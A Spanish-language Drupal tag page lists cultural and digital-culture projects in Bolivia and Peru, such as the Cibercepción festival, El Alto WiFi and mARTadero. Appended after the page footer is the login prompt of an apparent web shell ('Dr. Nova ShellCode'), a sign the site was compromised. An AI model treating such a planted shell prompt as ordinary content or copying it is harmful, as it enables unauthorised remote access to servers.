creación-producción

Error message

Deprecated function: The each() function is deprecated. This message will be suppressed on further calls in menu_set_active_trail() (line 2292 of /var/www/insularesdivergentes.org/includes/menu.inc).

Festival Cibercepción

País: 

Cibercepción es un festival de  video arte que organiza anualmente Samantha Bryce en Sucre (Bolivia), desde la asociación “Imaginea-Arte y Cultura”  con el apoyo de Hyvos y varias instituciones locales.

Dialectos Digitales

País: 

“Dialectos Digitales” es el festival de Cultura Digital que organizó Oficialía de Culturas de la Alcaldía de La Paz en 2009. Esta experiencia sucede a dos festivales previos (2008 y 2007) de creación digital organizados por la misma institución y coordinados por Daniel Rico.

El Alto WiFi

País: 
Categorías: 

El Alto Wifi es una iniciativa que tiene por objetivo viabilizar el acceso a la conectividad a internet entre los jóvenes habitantes de la ciudad de El Alto, una zona que crece arriba de la ciudad de La Paz sobre los 4 000 msnm.

Martadero

País: 

mARTadero es un proyecto de resignificación de un antiguo matadero en un barrio marginado en la ciudad de Cochabamba (Bolivia).

Siete Esquinas

País: 

Siete Esquinas es una plataforma online que acopia y difunde actividades culturales de la ciudad de Arequipa.

Asimetría

País: 

Asimetría nace en el año 2006 con el objetivo de establecer una plataforma abierta para investigar, difundir y crear un debate en torno a medios alternativos de comunicación basados en nuevas tecnologías.

Centro de Estudios Teológicos de la Amazonía

País: 

Es un instrumento para indagar nuevas rutas en la reflexión teológica y la práctica misionera desde las culturas amazónicas. Tiene también a su cargo la mejor biblioteca en lo que se refiere a temática amazónica.

Troonic

País: 

Egidio Auccahuaque es un educador y físico que trabajó durante 12 años como jefe de prácticas e un laboratorio en la especialidad de Ingeniería Electrónica de la PUCP (Pontificia Universidad Católica del Perú).

El Caminerito

País: 

El Caminerito es un magazine en internet sobre cultura y sociedad que alberga también discusiones sobre las actividades y la gestión cultural en la ciudad del Cuzco, inicialmente. El magazine funciona como un canal articulador de información para una comunidad de consumidores de cultura local.

Estamos en la Calle

País: 

El Proyecto de impacto cultural “Estamos en la Calle” surge de la idea de los mismos jóvenes artistas en su necesidad de recuperar el nuevo arte urbano en la ciudad de Iquitos, por lo que se decide tomar por asalto la calle.

Páginas

Subscribe to RSS - creación-producción
<xmp><body></xmp><xmp></body></html></xmp>Dr. Nova Login To Shell

Dr. Nova ShellCode
| Please Password |